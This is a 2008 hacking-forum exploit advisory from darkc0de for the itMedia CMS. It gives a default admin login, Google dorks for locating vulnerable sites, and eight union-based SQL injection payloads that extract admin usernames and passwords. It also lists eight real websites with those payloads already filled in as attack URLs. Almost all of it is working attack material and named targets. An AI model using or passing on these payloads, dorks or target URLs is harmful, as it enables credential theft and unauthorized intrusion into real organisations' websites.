################################################################ 
#       .___             __          _______       .___        # 
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
#        \/                  \/             \/                 # 
#                   ___________   ______  _  __                # 
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
#                 \  \___|  | \/\  ___/\     /                 # 
#                  \___  >__|    \___  >\/\_/                  # 
#      est.2007        \/            \/   forum.darkc0de.com   # 
################################################################ 
# ---  d3hydr8 - rsauron - P47r1ck - r45c4l - C1c4Tr1Z - bennu # 
# ---  QKrun1x  - skillfaker - Croathack - Optyx - Nuclear     #
# ---  Eliminator and to all members of darkc0de and ljuska.org#                                                             #
################################################################ 
# 
# Author: baltazar and sinner_01 
# 
# Home  : www.darkc0de.com & ljuska.org
# 
# Email : b4ltazar@gmail.com, sinn3r01@gmail.com
# 
# Share the c0de! 
# 
################################################################ 
# 
# App Name: itMedia
# 
# App Home: http://www.itmedia.ba/web.php
#
# Defaul admin login:
# Administrator:darko
#
# Admin page:
# http://site.com/admin/
#
# Dork: inurl:/galerija.php?op=slika
# Dork: inurl:/ponuda.php?op=slika
# Dork: inurl:/vijest.php?id= intext:itmedia
# Dork: inurl:/slike.php?op=slika
# 
# POC: vijest.php?id=-1+union+all+select+1,concat_ws(char(58),user,pass),3,4,5,6,7+from+admin--
# POC: vijesti.php?id=-1+union+all+select+1,2,concat_ws(char(58),user,pass)+from+admin--
# POC: vijest.php?id=-1+union+all+select+1,2,concat_ws(char(58),user,pass),4,5,6,7,8,9,10+from+admin--
# POC: galerija.php?op=slika&ids=-1+union+all+select+1,null,concat_ws(char(58),user,pass)+from+admin--
# POC: galerija.php?op=slika&ids=-1+union+all+select+1,null,concat_ws(char(58),user,pass),4,5+from+admin--
# POC: ponuda.php?op=slika&ids=-1+union+all+select+1,concat_ws(char(58),user,pass),3+from+admin--
# POC: ponuda.php?op=kategorija&id=-1+union+all+select+1,2,concat_ws(char(58),user,pass),4+from+admin--
# POC: slike.php?op=slika&ids=-1+union+all+select+1,2,concat_ws(char(58),user,pass),4,5+from+admin--
#Example:
# 
#http://www.radioklik.com/vijest.php?id=-1+union+all+select+1,concat_ws(char(58),user,pass),3,4,5,6,7+from+admin--
#http://www.golub-brodac.org/vijesti.php?id=-1+union+all+select+1,2,concat_ws(char(58),user,pass)+from+admin--
#http://www.blagoleks.net/vijest.php?id=-1+union+all+select+1,2,concat_ws(char(58),user,pass),4,5,6,7,8,9,10+from+admin--
#http://www.os-svetisava.com/galerija.php?op=slika&ids=-1+union+all+select+1,null,concat_ws(char(58),user,pass)+from+admin--
#http://www.ujzrs.org/galerija.php?op=slika&ids=-1+union+all+select+1,null,concat_ws(char(58),user,pass),4,5+from+admin--
#http://www.mihajlovic-bih.com/ponuda.php?op=slika&ids=-1+union+all+select+1,concat_ws(char(58),user,pass),3+from+admin--
#http://www.nekretninebijeljina.ba/ponuda.php?op=kategorija&id=-1+union+all+select+1,2,concat_ws(char(58),user,pass),4+from+admin--
#http://www.signum.ba/slike.php?op=slika&ids=-1+union+all+select+1,2,concat_ws(char(58),user,pass),4,5+from+admin--
################################################################ 
# Vuln Discovered 08/17/2008